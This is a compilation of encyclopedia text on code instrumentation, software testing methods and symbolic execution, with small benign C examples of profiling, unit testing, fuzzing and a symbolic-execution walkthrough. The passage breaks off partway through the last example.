In computer programming, instrumentation is the act of modifying software so that analysis can be performed on it.[1] Generally, instrumentation either modifies source code or binary code. Execution environments like the JVM provide separate interfaces to add instrumentation to program executions, such as the JVMTI, which enables instrumentation during program start. Instrumentation enables profiling:[2] measuring dynamic behavior during a test run. This is useful for properties of a program that cannot be analyzed statically with sufficient precision, such as performance and alias analysis. Instrumentation can include code tracing, profiling, performance counters, and logging. Instrumentation is limited by execution coverage. If the program never reaches a particular point of execution, then instrumentation at that point collects no data. For instance, if a word processor application is instrumented, but the user never activates the print feature, then the instrumentation can say nothing about the routines which are used exclusively by the printing feature. Instrumentation increases the execution time of a program. In some contexts, this increase might be dramatic and hence limit the application of instrumentation to debugging contexts. The overhead differs depending on the instrumentation technology used.[4]
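As a minimal illustration of source-level instrumentation (hand-written here; real tools insert equivalent probes automatically at compile time, link time, or run time), the sketch below counts calls to a routine and accumulates its execution time.

    #include <stdio.h>
    #include <time.h>

    static unsigned long g_calls;
    static double        g_seconds;

    static void work(void)
    {
        /* ... code being profiled ... */
    }

    /* Instrumented wrapper: a counter and a timer around the routine. */
    static void instrumented_work(void)
    {
        clock_t start = clock();
        work();
        g_seconds += (double)(clock() - start) / CLOCKS_PER_SEC;
        g_calls++;
    }

    int main(void)
    {
        for (int i = 0; i < 1000; i++)
            instrumented_work();
        printf("work(): %lu calls, %.6f s total\n", g_calls, g_seconds);
        return 0;
    }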
https://en.wikipedia.org/wiki/Code_instrumentation
Software testingis the act of checking whethersoftwaresatisfies expectations. Software testing can provide objective, independent information about thequalityof software and theriskof its failure to auseror sponsor.[1] Software testing can determine thecorrectnessof software for specificscenariosbut cannot determine correctness for all scenarios.[2][3]It cannot find allbugs. Based on the criteria for measuring correctness from anoracle, software testing employs principles and mechanisms that might recognize a problem. Examples of oracles includespecifications,contracts,[4]comparable products, past versions of the same product, inferences about intended or expected purpose, user or customer expectations, relevant standards, and applicable laws. Software testing is often dynamic in nature; running the software to verify actual output matches expected. It can also be static in nature; reviewingcodeand its associateddocumentation. Software testing is often used to answer the question: Does the software do what it is supposed to do and what it needs to do? Information learned from software testing may be used to improve the process by which software is developed.[5]: 41–43 Software testing should follow a "pyramid" approach wherein most of your tests should beunit tests, followed byintegration testsand finallyend-to-end (e2e) testsshould have the lowest proportion.[6][7][8] A study conducted byNISTin 2002 reported that software bugs cost the U.S. economy $59.5 billion annually. More than a third of this cost could be avoided if better software testing was performed.[9][dubious–discuss] Outsourcingsoftware testing because of costs is very common, with China, the Philippines, and India being preferred destinations.[citation needed] Glenford J. Myersinitially introduced the separation ofdebuggingfrom testing in 1979.[10]Although his attention was on breakage testing ("A successful test case is one that detects an as-yet undiscovered error."[10]: 16), it illustrated the desire of the software engineering community to separate fundamental development activities, such as debugging, from that of verification. Software testing is typically goal driven. Software testing typically includes handling software bugs – a defect in thecodethat causes an undesirable result.[11]: 31Bugs generally slow testing progress and involveprogrammerassistance todebugand fix. Not all defects cause a failure. For example, a defect indead codewill not be considered a failure. A defect that does not cause failure at one point in time may lead to failure later due to environmental changes. Examples of environment change include running on newcomputer hardware, changes indata, and interacting with different software.[12] A single defect may result in multiple failure symptoms. Software testing may involve a Requirements gap – omission from the design for a requirement.[5]: 426Requirement gaps can often benon-functional requirementssuch astestability,scalability,maintainability,performance, andsecurity. A fundamental limitation of software testing is that testing underallcombinations of inputs and preconditions (initial state) is not feasible, even with a simple product.[3]: 17–18[13]Defects that manifest in unusual conditions are difficult to find in testing. Also,non-functionaldimensions of quality (how it is supposed tobeversus what it is supposed todo) –usability,scalability,performance,compatibility, andreliability– can be subjective; something that constitutes sufficient value to one person may not to another. 
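As a minimal illustration of the lowest layer of that pyramid, the sketch below unit-tests a hypothetical clamp() helper. The hard-coded expected values play the role of the oracle discussed above, and the inputs are chosen around the boundaries of the valid range.

    #include <assert.h>

    /* Unit under test: a hypothetical clamp() helper. */
    static int clamp(int value, int lo, int hi)
    {
        if (value < lo) return lo;
        if (value > hi) return hi;
        return value;
    }

    /* A unit test: each assertion compares actual output to an expected
       value, with boundary values chosen deliberately. */
    int main(void)
    {
        assert(clamp(-5, 0, 10) ==  0);   /* below the range  */
        assert(clamp( 0, 0, 10) ==  0);   /* lower boundary   */
        assert(clamp( 7, 0, 10) ==  7);   /* inside the range */
        assert(clamp(10, 0, 10) == 10);   /* upper boundary   */
        assert(clamp(11, 0, 10) == 10);   /* above the range  */
        return 0;
    }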
Although testing for every possible input is not feasible, testing can usecombinatoricsto maximize coverage while minimizing tests.[14] Testing can be categorized many ways.[15] Software testing can be categorized into levels based on how much of thesoftware systemis the focus of a test.[18][19][20][21] There are many approaches to software testing.Reviews,walkthroughs, orinspectionsare referred to as static testing, whereas executing programmed code with a given set oftest casesis referred to asdynamic testing.[23][24] Static testing is often implicit, like proofreading, plus when programming tools/text editors check source code structure or compilers (pre-compilers) check syntax and data flow asstatic program analysis. Dynamic testing takes place when the program itself is run. Dynamic testing may begin before the program is 100% complete in order to test particular sections of code and are applied to discretefunctionsor modules.[23][24]Typical techniques for these are either usingstubs/drivers or execution from adebuggerenvironment.[24] Static testing involvesverification, whereas dynamic testing also involvesvalidation.[24] Passive testing means verifying the system's behavior without any interaction with the software product. Contrary to active testing, testers do not provide any test data but look at system logs and traces. They mine for patterns and specific behavior in order to make some kind of decisions.[25]This is related to offlineruntime verificationandlog analysis. The type of testing strategy to be performed depends on whether the tests to be applied to the IUT should be decided before the testing plan starts to be executed (preset testing[28]) or whether each input to be applied to the IUT can be dynamically dependent on the outputs obtained during the application of the previous tests (adaptive testing[29][30]). Software testing can often be divided into white-box and black-box. These two approaches are used to describe the point of view that the tester takes when designing test cases. A hybrid approach called grey-box that includes aspects of both boxes may also be applied to software testing methodology.[31][32] White-box testing (also known as clear box testing, glass box testing, transparent box testing, and structural testing) verifies the internal structures or workings of a program, as opposed to the functionality exposed to the end-user. In white-box testing, an internal perspective of the system (the source code), as well as programming skills are used to design test cases. The tester chooses inputs to exercise paths through the code and determines the appropriate outputs.[31][32]This is analogous to testing nodes in a circuit, e.g.,in-circuit testing(ICT). While white-box testing can be applied at theunit,integration, andsystemlevels of the software testing process, it is usually done at the unit level.[33]It can test paths within a unit, paths between units during integration, and between subsystems during a system–level test. Though this method of test design can uncover many errors or problems, it might not detect unimplemented parts of the specification or missing requirements. Techniques used in white-box testing include:[32][34] Code coverage tools can evaluate the completeness of a test suite that was created with any method, including black-box testing. 
This allows the software team to examine parts of a system that are rarely tested and ensures that the most importantfunction pointshave been tested.[35]Code coverage as asoftware metriccan be reported as a percentage for:[31][35][36] 100% statement coverage ensures that all code paths or branches (in terms ofcontrol flow) are executed at least once. This is helpful in ensuring correct functionality, but not sufficient since the same code may process different inputs correctly or incorrectly.[37] Black-box testing (also known as functional testing) describes designing test cases without knowledge of the implementation, without reading the source code. The testers are only aware of what the software is supposed to do, not how it does it.[38]Black-box testing methods include:equivalence partitioning,boundary value analysis,all-pairs testing,state transition tables,decision tabletesting,fuzz testing,model-based testing,use casetesting,exploratory testing, and specification-based testing.[31][32][36] Specification-based testing aims to test the functionality of software according to the applicable requirements.[39]This level of testing usually requires thoroughtest casesto be provided to the tester, who then can simply verify that for a given input, the output value (or behavior), either "is" or "is not" the same as the expected value specified in the test case. Test cases are built around specifications and requirements, i.e., what the application is supposed to do. It uses external descriptions of the software, including specifications, requirements, and designs, to derive test cases. These tests can befunctionalornon-functional, though usually functional. Specification-based testing may be necessary to assure correct functionality, but it is insufficient to guard against complex or high-risk situations.[40] Black box testing can be used to any level of testing although usually not at the unit level.[33] Component interface testing Component interface testing is a variation ofblack-box testing, with the focus on the data values beyond just the related actions of a subsystem component.[41]The practice of component interface testing can be used to check the handling of data passed between various units, or subsystem components, beyond full integration testing between those units.[42][43]The data being passed can be considered as "message packets" and the range or data types can be checked for data generated from one unit and tested for validity before being passed into another unit. One option for interface testing is to keep a separate log file of data items being passed, often with a timestamp logged to allow analysis of thousands of cases of data passed between units for days or weeks. Tests can include checking the handling of some extreme data values while other interface variables are passed as normal values.[42]Unusual data values in an interface can help explain unexpected performance in the next unit. The aim of visual testing is to provide developers with the ability to examine what was happening at the point of software failure by presenting the data in such a way that the developer can easily find the information he or she requires, and the information is expressed clearly.[44][45] At the core of visual testing is the idea that showing someone a problem (or a test failure), rather than just describing it, greatly increases clarity and understanding. 
Visual testing, therefore, requires the recording of the entire test process – capturing everything that occurs on the test system in video format. Output videos are supplemented by real-time tester input via picture-in-a-picture webcam and audio commentary from microphones. Visual testing provides a number of advantages. The quality of communication is increased drastically because testers can show the problem (and the events leading up to it) to the developer as opposed to just describing it, and the need to replicate test failures will cease to exist in many cases. The developer will have all the evidence he or she requires of a test failure and can instead focus on the cause of the fault and how it should be fixed. Ad hoc testingandexploratory testingare important methodologies for checking software integrity because they require less preparation time to implement, while the important bugs can be found quickly.[46]In ad hoc testing, where testing takes place in an improvised impromptu way, the ability of the tester(s) to base testing off documented methods and then improvise variations of those tests can result in a more rigorous examination of defect fixes.[46]However, unless strict documentation of the procedures is maintained, one of the limits of ad hoc testing is lack of repeatability.[46] Grey-box testing (American spelling: gray-box testing) involves using knowledge of internal data structures and algorithms for purposes of designing tests while executing those tests at the user, or black-box level. The tester will often have access to both "the source code and the executable binary."[47]Grey-box testing may also includereverse engineering(using dynamic code analysis) to determine, for instance, boundary values or error messages.[47]Manipulating input data and formatting output do not qualify as grey-box, as the input and output are clearly outside of the "black box" that we are calling the system under test. This distinction is particularly important when conductingintegration testingbetween two modules of code written by two different developers, where only the interfaces are exposed for the test. By knowing the underlying concepts of how the software works, the tester makes better-informed testing choices while testing the software from outside. Typically, a grey-box tester will be permitted to set up an isolated testing environment with activities, such as seeding adatabase. The tester can observe the state of the product being tested after performing certain actions such as executingSQLstatements against the database and then executing queries to ensure that the expected changes have been reflected. Grey-box testing implements intelligent test scenarios based on limited information. This will particularly apply to data type handling,exception handling, and so on.[48] With the concept of grey-box testing, this "arbitrary distinction" between black- and white-box testing has faded somewhat.[33] Most software systems have installation procedures that are needed before they can be used for their main purpose. Testing these procedures to achieve an installed software system that may be used is known asinstallation testing.[49]: 139These procedures may involve full or partial upgrades, and install/uninstall processes. 
A common cause of software failure (real or perceived) is a lack of itscompatibilitywith otherapplication software,operating systems(or operating systemversions, old or new), or target environments that differ greatly from the original (such as aterminalorGUIapplication intended to be run on thedesktopnow being required to become aWeb application, which must render in aWeb browser). For example, in the case of a lack ofbackward compatibility, this can occur because the programmers develop and test software only on the latest version of the target environment, which not all users may be running. This results in the unintended consequence that the latest work may not function on earlier versions of the target environment, or on older hardware that earlier versions of the target environment were capable of using. Sometimes such issues can be fixed by proactivelyabstractingoperating system functionality into a separate programmoduleorlibrary. Sanity testingdetermines whether it is reasonable to proceed with further testing. Smoke testingconsists of minimal attempts to operate the software, designed to determine whether there are any basic problems that will prevent it from working at all. Such tests can be used asbuild verification test. Regression testing focuses on finding defects after a major code change has occurred. Specifically, it seeks to uncoversoftware regressions, as degraded or lost features, including old bugs that have come back. Such regressions occur whenever software functionality that was previously working correctly, stops working as intended. Typically, regressions occur as anunintended consequenceof program changes, when the newly developed part of the software collides with the previously existing code. Regression testing is typically the largest test effort in commercial software development,[50]due to checking numerous details in prior software features, and even new software can be developed while using some old test cases to test parts of the new design to ensure prior functionality is still supported. Common methods of regression testing include re-running previous sets of test cases and checking whether previously fixed faults have re-emerged. The depth of testing depends on the phase in the release process and theriskof the added features. They can either be complete, for changes added late in the release or deemed to be risky, or be very shallow, consisting of positive tests on each feature, if the changes are early in the release or deemed to be of low risk. Acceptance testing is system-level testing to ensure the software meets customer expectations.[51][52][53][54] Acceptance testing may be performed as part of the hand-off process between any two phases of development.[citation needed] Tests are frequently grouped into these levels by where they are performed in the software development process, or by the level of specificity of the test.[54] Sometimes, UAT is performed by the customer, in their environment and on their own hardware. OAT is used to conduct operational readiness (pre-release) of a product, service or system as part of aquality management system. OAT is a common type of non-functional software testing, used mainly insoftware developmentandsoftware maintenanceprojects. This type of testing focuses on the operational readiness of the system to be supported, or to become part of the production environment. 
Hence, it is also known as operational readiness testing (ORT) oroperations readiness and assurance(OR&A) testing.Functional testingwithin OAT is limited to those tests that are required to verify thenon-functionalaspects of the system. In addition, the software testing should ensure that the portability of the system, as well as working as expected, does not also damage or partially corrupt its operating environment or cause other processes within that environment to become inoperative.[55] Contractual acceptance testing is performed based on the contract's acceptance criteria defined during the agreement of the contract, while regulatory acceptance testing is performed based on the relevant regulations to the software product. Both of these two tests can be performed by users or independent testers. Regulation acceptance testing sometimes involves the regulatory agencies auditing the test results.[54] Alpha testing is simulated or actual operational testing by potential users/customers or an independent test team at the developers' site. Alpha testing is often employed for off-the-shelf software as a form of internal acceptance testing before the software goes to beta testing.[56] Beta testing comes after alpha testing and can be considered a form of externaluser acceptance testing. Versions of the software, known asbeta versions, are released to a limited audience outside of the programming team known as beta testers. The software is released to groups of people so that further testing can ensure the product has few faults orbugs. Beta versions can be made available to the open public to increase thefeedbackfield to a maximal number of future users and to deliver value earlier, for an extended or even indefinite period of time (perpetual beta).[57] Functional testingrefers to activities that verify a specific action or function of the code. These are usually found in the code requirements documentation, although some development methodologies work from use cases or user stories. Functional tests tend to answer the question of "can the user do this" or "does this particular feature work." Non-functional testingrefers to aspects of the software that may not be related to a specific function or user action, such asscalabilityor otherperformance, behavior under certainconstraints, orsecurity. Testing will determine the breaking point, the point at which extremes of scalability or performance leads to unstable execution. Non-functional requirements tend to be those that reflect the quality of the product, particularly in the context of the suitability perspective of its users. Continuous testing is the process of executingautomated testsas part of the software delivery pipeline to obtain immediate feedback on the business risks associated with a software release candidate.[58][59]Continuous testing includes the validation of bothfunctional requirementsandnon-functional requirements; the scope of testing extends from validating bottom-up requirements or user stories to assessing the system requirements associated with overarching business goals.[60][61] Destructive testing attempts to cause the software or a sub-system to fail. It verifies that the software functions properly even when it receives invalid or unexpected inputs, thereby establishing therobustnessof input validation and error-management routines.[citation needed]Software fault injection, in the form offuzzing, is an example of failure testing. 
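A minimal sketch of that idea in C, with a deliberately simple, hypothetical parse_record() standing in for the component under test: the test feeds it large numbers of random inputs and checks only that it stays within its contract.

    #include <assert.h>
    #include <stdlib.h>

    /* Hypothetical unit under test: accepts a record only if it starts
       with the byte 0x7F and its second byte equals the payload length. */
    static int parse_record(const unsigned char *buf, size_t len)
    {
        if (len < 2 || buf[0] != 0x7F) return -1;
        if ((size_t)buf[1] != len - 2) return -1;
        return 0;
    }

    /* Crude fuzz-style destructive test: random inputs, checking only that
       the parser returns 0 or -1 and does not crash. */
    int main(void)
    {
        unsigned char buf[256];
        srand(12345);                       /* fixed seed for reproducibility */
        for (int i = 0; i < 100000; i++) {
            size_t len = (size_t)(rand() % (int)sizeof buf);
            for (size_t j = 0; j < len; j++)
                buf[j] = (unsigned char)(rand() & 0xFF);
            int rc = parse_record(buf, len);
            assert(rc == 0 || rc == -1);
        }
        return 0;
    }

Dedicated fuzzers add coverage feedback and input mutation, but the structure, random inputs plus a crash or contract check rather than exact expected outputs, is the same.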
Various commercial non-functional testing tools are linked from thesoftware fault injectionpage; there are also numerous open-source and free software tools available that perform destructive testing. Performance testing is generally executed to determine how a system or sub-system performs in terms of responsiveness and stability under a particular workload. It can also serve to investigate, measure, validate or verify other quality attributes of the system, such as scalability, reliability and resource usage. Load testingis primarily concerned with testing that the system can continue to operate under a specific load, whether that be large quantities of data or a large number ofusers. This is generally referred to as softwarescalability. The related load testing activity of when performed as a non-functional activity is often referred to asendurance testing.Volume testingis a way to test software functions even when certain components (for example a file or database) increase radically in size.Stress testingis a way to test reliability under unexpected or rare workloads.Stability testing(often referred to as load or endurance testing) checks to see if the software can continuously function well in or above an acceptable period. There is little agreement on what the specific goals of performance testing are. The terms load testing, performance testing,scalability testing, and volume testing, are often used interchangeably. Real-time softwaresystems have strict timing constraints. To test if timing constraints are met,real-time testingis used. Usability testingis to check if the user interface is easy to use and understand. It is concerned mainly with the use of the application. This is not a kind of testing that can be automated; actual human users are needed, being monitored by skilledUI designers. Usability testing can use structured models to check how well an interface works. The Stanton, Theofanos, and Joshi (2015) model looks at user experience, and the Al-Sharafat and Qadoumi (2016) model is for expert evaluation, helping to assess usability in digital applications.[62] Accessibilitytesting is done to ensure that the software is accessible to persons with disabilities. Some of the common web accessibility tests are Security testingis essential for software that processes confidential data to preventsystem intrusionbyhackers. The International Organization for Standardization (ISO) defines this as a "type of testing conducted to evaluate the degree to which a test item, and associated data and information, are protected so that unauthorised persons or systems cannot use, read or modify them, and authorized persons or systems are not denied access to them."[63] Testing forinternationalization and localizationvalidates that the software can be used with different languages and geographic regions. The process ofpseudolocalizationis used to test the ability of an application to be translated to another language, and make it easier to identify when the localization process may introduce new bugs into the product. Globalization testing verifies that the software is adapted for a new culture, such as different currencies or time zones.[64] Actual translation to human languages must be tested, too. Possible localization and globalization failures include: Development testing is a software development process that involves the synchronized application of a broad spectrum of defect prevention and detection strategies in order to reduce software development risks, time, and costs. 
It is performed by the software developer or engineer during the construction phase of the software development lifecycle. Development testing aims to eliminate construction errors before code is promoted to other testing; this strategy is intended to increase the quality of the resulting software as well as the efficiency of the overall development process. Depending on the organization's expectations for software development, development testing might include static code analysis, data flow analysis, metrics analysis, peer code reviews, unit testing, code coverage analysis, traceability, and other software testing practices. A/B testing is a method of running a controlled experiment to determine if a proposed change is more effective than the current approach. Customers are routed to either a current version (control) of a feature, or to a modified version (treatment), and data is collected to determine which version is better at achieving the desired outcome. Concurrent or concurrency testing assesses the behaviour and performance of software and systems that use concurrent computing, generally under normal usage conditions. Typical problems this type of testing will expose are deadlocks, race conditions and problems with shared memory/resource handling. In software testing, conformance testing verifies that a product performs according to its specified standards. Compilers, for instance, are extensively tested to determine whether they meet the recognized standard for that language. Comparing program output against a stored expected output, whether as a data comparison of text or as screenshots of the UI,[3]: 195 is sometimes called snapshot testing or Golden Master Testing. Unlike many other forms of testing, this cannot detect failures automatically and instead requires that a human evaluate the output for inconsistencies. Property testing is a testing technique where, instead of asserting that specific inputs produce specific expected outputs, the practitioner randomly generates many inputs, runs the program on all of them, and asserts the truth of some "property" that should be true for every pair of input and output. For example, every output from a serialization function should be accepted by the corresponding deserialization function, and every output from a sort function should be a monotonically increasing list containing exactly the same elements as its input. Property testing libraries allow the user to control the strategy by which random inputs are constructed, to ensure coverage of degenerate cases, or inputs featuring specific patterns that are needed to fully exercise aspects of the implementation under test. Property testing is also sometimes known as "generative testing" or "QuickCheck testing" since it was introduced and popularized by the Haskell library QuickCheck.[65] Metamorphic testing (MT) is a property-based software testing technique, which can be an effective approach for addressing the test oracle problem and the test case generation problem. The test oracle problem is the difficulty of determining the expected outcomes of selected test cases, or of determining whether the actual outputs agree with the expected outcomes. VCR testing, also known as "playback testing" or "record/replay" testing, is a testing technique for increasing the reliability and speed of regression tests that involve a component that is slow or unreliable to communicate with, often a third-party API outside of the tester's control.
It involves making a recording ("cassette") of the system's interactions with the external component, and then replaying the recorded interactions as a substitute for communicating with the external system on subsequent runs of the test. The technique was popularized in web development by the Ruby libraryvcr. In an organization, testers may be in a separate team from the rest of thesoftware developmentteam or they may be integrated into one team. Software testing can also be performed by non-dedicated software testers. In the 1980s, the termsoftware testerstarted to be used to denote a separate profession. Notable software testing roles and titles include:[66]test manager,test lead,test analyst,test designer,tester,automation developer, andtest administrator.[67] Organizations that develop software, perform testing differently, but there are common patterns.[2] Inwaterfall development, testing is generally performed after the code is completed, but before the product is shipped to the customer.[68]This practice often results in the testing phase being used as aprojectbuffer to compensate for project delays, thereby compromising the time devoted to testing.[10]: 145–146 Some contend that the waterfall process allows for testing to start when the development project starts and to be a continuous process until the project finishes.[69] Agile software developmentcommonly involves testing while the code is being written and organizing teams with both programmers and testers and with team members performing both programming and testing. One agile practice,test-driven software development(TDD), is a way ofunit testingsuch that unit-level testing is performed while writing the product code.[70]Test code is updated as new features are added and failure conditions are discovered (bugs fixed). Commonly, the unit test code is maintained with the project code, integrated in the build process, and run on each build and as part of regression testing. Goals of thiscontinuous integrationis to support development and reduce defects.[71][70] Even in organizations that separate teams by programming and testing functions, many often have the programmers performunit testing.[72] The sample below is common for waterfall development. The same activities are commonly found in other development models, but might be described differently. Software testing is used in association withverification and validation:[73] The terms verification and validation are commonly used interchangeably in the industry; it is also common to see these two terms defined with contradictory definitions. According to theIEEE StandardGlossary of Software Engineering Terminology:[11]: 80–81 And, according to the ISO 9000 standard: The contradiction is caused by the use of the concepts of requirements and specified requirements but with different meanings. In the case of IEEE standards, the specified requirements, mentioned in the definition of validation, are the set of problems, needs and wants of the stakeholders that the software must solve and satisfy. Such requirements are documented in a Software Requirements Specification (SRS). And, the products mentioned in the definition of verification, are the output artifacts of every phase of the software development process. These products are, in fact, specifications such as Architectural Design Specification, Detailed Design Specification, etc. The SRS is also a specification, but it cannot be verified (at least not in the sense used here, more on this subject below). 
But, for the ISO 9000, the specified requirements are the set of specifications, as just mentioned above, that must be verified. A specification, as previously explained, is the product of a software development process phase that receives another specification as input. A specification is verified successfully when it correctly implements its input specification. All the specifications can be verified except the SRS because it is the first one (it can be validated, though). Examples: The Design Specification must implement the SRS; and, the Construction phase artifacts must implement the Design Specification. So, when these words are defined in common terms, the apparent contradiction disappears. Both the SRS and the software must be validated. The SRS can be validated statically by consulting with the stakeholders. Nevertheless, running some partial implementation of the software or a prototype of any kind (dynamic testing) and obtaining positive feedback from them, can further increase the certainty that the SRS is correctly formulated. On the other hand, the software, as a final and running product (not its artifacts and documents, including the source code) must be validated dynamically with the stakeholders by executing the software and having them to try it. Some might argue that, for SRS, the input is the words of stakeholders and, therefore, SRS validation is the same as SRS verification. Thinking this way is not advisable as it only causes more confusion. It is better to think of verification as a process involving a formal and technical input document. In some organizations, software testing is part of asoftware quality assurance(SQA) process.[3]: 347In SQA, software process specialists and auditors are concerned with the software development process rather than just the artifacts such as documentation, code and systems. They examine and change thesoftware engineeringprocess itself to reduce the number of faults that end up in the delivered software: the so-called defect rate. What constitutes an acceptable defect rate depends on the nature of the software; a flight simulator video game would have much higher defect tolerance than software for an actual airplane. Although there are close links with SQA, testing departments often exist independently, and there may be no SQA function in some companies.[citation needed] Software testing is an activity to investigate software under test in order to provide quality-related information to stakeholders. By contrast, QA (quality assurance) is the implementation of policies and procedures intended to prevent defects from reaching customers. Quality measures include such topics ascorrectness, completeness,securityandISO/IEC 9126requirements such as capability,reliability,efficiency,portability,maintainability, compatibility, andusability. There are a number of frequently usedsoftware metrics, or measures, which are used to assist in determining the state of the software or the adequacy of the testing. A software testing process can produce severalartifacts. The actual artifacts produced are a factor of the software development model used, stakeholder and organisational needs. Atest planis a document detailing the approach that will be taken for intended test activities. 
The plan may include aspects such as objectives, scope, processes and procedures, personnel requirements, and contingency plans.[51]The test plan could come in the form of a single plan that includes all test types (like an acceptance or system test plan) and planning considerations, or it may be issued as a master test plan that provides an overview of more than one detailed test plan (a plan of a plan).[51]A test plan can be, in some cases, part of a wide "test strategy" which documents overall testing approaches, which may itself be a master test plan or even a separate artifact. Atest casenormally consists of a unique identifier, requirement references from a design specification, preconditions, events, a series of steps (also known as actions) to follow, input, output, expected result, and the actual result. Clinically defined, a test case is an input and an expected result.[75]This can be as terse as "for condition x your derived result is y", although normally test cases describe in more detail the input scenario and what results might be expected. It can occasionally be a series of steps (but often steps are contained in a separate test procedure that can be exercised against multiple test cases, as a matter of economy) but with one expected result or expected outcome. The optional fields are a test case ID, test step, or order of execution number, related requirement(s), depth, test category, author, and check boxes for whether the test is automatable and has been automated. Larger test cases may also contain prerequisite states or steps, and descriptions. A test case should also contain a place for the actual result. These steps can be stored in a word processor document, spreadsheet, database, or other common repositories. In a database system, you may also be able to see past test results, who generated the results, and what system configuration was used to generate those results. These past results would usually be stored in a separate table. Atest scriptis a procedure or programming code that replicates user actions. Initially, the term was derived from the product of work created by automated regression test tools. A test case will be a baseline to create test scripts using a tool or a program. In most cases, multiple sets of values or data are used to test the same functionality of a particular feature. All the test values and changeable environmental components are collected in separate files and stored as test data. It is also useful to provide this data to the client and with the product or a project. There are techniques to generate Test data. The software, tools, samples of data input and output, and configurations are all referred to collectively as atest harness. A test run is a collection of test cases or test suites that the user is executing and comparing the expected with the actual results. Once complete, a report or all executed tests may be generated. Several certification programs exist to support the professional aspirations of software testers and quality assurance specialists. A few practitioners argue that the testing field is not ready for certification, as mentioned in thecontroversysection. Some of the majorsoftware testing controversiesinclude: It is commonly believed that the earlier a defect is found, the cheaper it is to fix it. 
The following table shows the cost of fixing the defect depending on the stage it was found.[85]For example, if a problem in the requirements is found only post-release, then it would cost 10–100 times more to fix than if it had already been found by the requirements review. With the advent of moderncontinuous deploymentpractices and cloud-based services, the cost of re-deployment and maintenance may lessen over time. The data from which this table is extrapolated is scant. Laurent Bossavit says in his analysis: The "smaller projects" curve turns out to be from only two teams of first-year students, a sample size so small that extrapolating to "smaller projects in general" is totally indefensible. The GTE study does not explain its data, other than to say it came from two projects, one large and one small. The paper cited for the Bell Labs "Safeguard" project specifically disclaims having collected the fine-grained data that Boehm's data points suggest. The IBM study (Fagan's paper) contains claims that seem to contradict Boehm's graph and no numerical results that clearly correspond to his data points. Boehm doesn't even cite a paper for the TRW data, except when writing for "Making Software" in 2010, and there he cited the original 1976 article. There exists a large study conducted at TRW at the right time for Boehm to cite it, but that paper doesn't contain the sort of data that would support Boehm's claims.[86]
https://en.wikipedia.org/wiki/Software_testing#Code_coverage
Incomputer science,symbolic execution(alsosymbolic evaluationorsymbex) is a means ofanalyzing a programto determine whatinputscause each part of a program toexecute. Aninterpreterfollows the program, assuming symbolic values for inputs rather than obtaining actual inputs as normal execution of the program would. It thus arrives at expressions in terms of those symbols for expressions and variables in the program, and constraints in terms of those symbols for the possible outcomes of each conditional branch. Finally, the possible inputs that trigger a branch can be determined by solving the constraints. The field ofsymbolic simulationapplies the same concept to hardware.Symbolic computationapplies the concept to the analysis of mathematical expressions. Consider the program below, which reads in a value and fails if the input is 6. During a normal execution ("concrete" execution), the program would read a concrete input value (e.g., 5) and assign it toy. Execution would then proceed with the multiplication and the conditional branch, which would evaluate to false and printOK. During symbolic execution, the program reads a symbolic value (e.g.,λ) and assigns it toy. The program would then proceed with the multiplication and assignλ * 2toz. When reaching theifstatement, it would evaluateλ * 2 == 12. At this point of the program,λcould take any value, and symbolic execution can therefore proceed along both branches, by "forking" two paths. Each path gets assigned a copy of the program state at the branch instruction as well as a path constraint. In this example, the path constraint isλ * 2 == 12for theifbranch andλ * 2 != 12for theelsebranch. Both paths can be symbolically executed independently. When paths terminate (e.g., as a result of executingfail()or simply exiting), symbolic execution computes a concrete value forλby solving the accumulated path constraints on each path. These concrete values can be thought of as concrete test cases that can, e.g., help developers reproduce bugs. In this example, theconstraint solverwould determine that in order to reach thefail()statement,λwould need to equal 6. Symbolically executing all feasible program paths does not scale to large programs. The number of feasible paths in a program grows exponentially with an increase in program size and can even be infinite in the case of programs with unbounded loop iterations.[1]Solutions to thepath explosionproblem generally use either heuristics for path-finding to increase code coverage,[2]reduce execution time by parallelizing independent paths,[3]or by merging similar paths.[4]One example of merging isveritesting, which "employs static symbolic execution to amplify the effect of dynamic symbolic execution".[5] Symbolic execution is used to reason about a program path-by-path which is an advantage over reasoning about a program input-by-input as other testing paradigms use (e.g.dynamic program analysis). However, if few inputs take the same path through the program, there is little savings over testing each of the inputs separately. Symbolic execution is harder when the same memory location can be accessed through different names (aliasing). Aliasing cannot always be recognized statically, so the symbolic execution engine can't recognize that a change to the value of one variable also changes the other.[6] Since an array is a collection of many distinct values, symbolic executors must either treat the entire array as one value or treat each array element as a separate location. 
The problem with treating each array element separately is that a reference such as "A[i]" can only be specified dynamically, when the value for i has a concrete value.[6] Programs interact with their environment by performing system calls, receiving signals, etc. Consistency problems may arise when execution reaches components that are not under control of the symbolic execution tool (e.g., kernel or libraries). Consider the following example (a reconstruction of the listing is sketched at the end of this section): the program opens a file and, based on some condition, writes different kinds of data to the file; it then later reads back the written data. In theory, symbolic execution would fork two paths at line 5, and each path from there on would have its own copy of the file. The statement at line 11 would therefore return data that is consistent with the value of "condition" at line 5. In practice, file operations are implemented as system calls in the kernel and are outside the control of the symbolic execution tool. The main approaches to address this challenge are: (1) Executing calls to the environment directly. The advantage of this approach is that it is simple to implement. The disadvantage is that the side effects of such calls will clobber all states managed by the symbolic execution engine. In the example above, the instruction at line 11 would return "some datasome other data" or "some other datasome data" depending on the sequential ordering of the states. (2) Modeling the environment. In this case, the engine instruments the system calls with a model that simulates their effects and that keeps all the side effects in per-state storage. The advantage is that one gets correct results when symbolically executing programs that interact with the environment. The disadvantage is that one needs to implement and maintain many potentially complex models of system calls. Tools such as KLEE,[7] Cloud9, and Otter[8] take this approach by implementing models for file system operations, sockets, IPC, etc. (3) Forking the entire system state. Symbolic execution tools based on virtual machines solve the environment problem by forking the entire VM state. For example, in S2E[9] each state is an independent VM snapshot that can be executed separately. This approach alleviates the need for writing and maintaining complex models and allows virtually any program binary to be executed symbolically. However, it has higher memory usage overheads (VM snapshots may be large). The concept of symbolic execution was introduced academically in the 1970s with descriptions of the Select system,[13] the EFFIGY system,[14] the DISSECT system,[15] and Clarke's system.[16]
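The first program discussed in this section (the one that "reads in a value and fails if the input is 6") did not survive extraction. The following C sketch is a reconstruction consistent with the walkthrough above, in which the input is doubled and compared against 12; it is not the article's original listing.

```c
#include <stdio.h>
#include <stdlib.h>

static void fail(void) {
    fprintf(stderr, "failure\n");
    abort();
}

int main(void) {
    int y, z;
    if (scanf("%d", &y) != 1)   /* concrete run: e.g. y = 5; symbolic run: y = λ       */
        return 1;
    z = y * 2;                  /* symbolic state: z = λ * 2                            */
    if (z == 12)                /* fork: path constraint λ * 2 == 12 on this branch     */
        fail();                 /* solving the constraint yields λ = 6 as a test case   */
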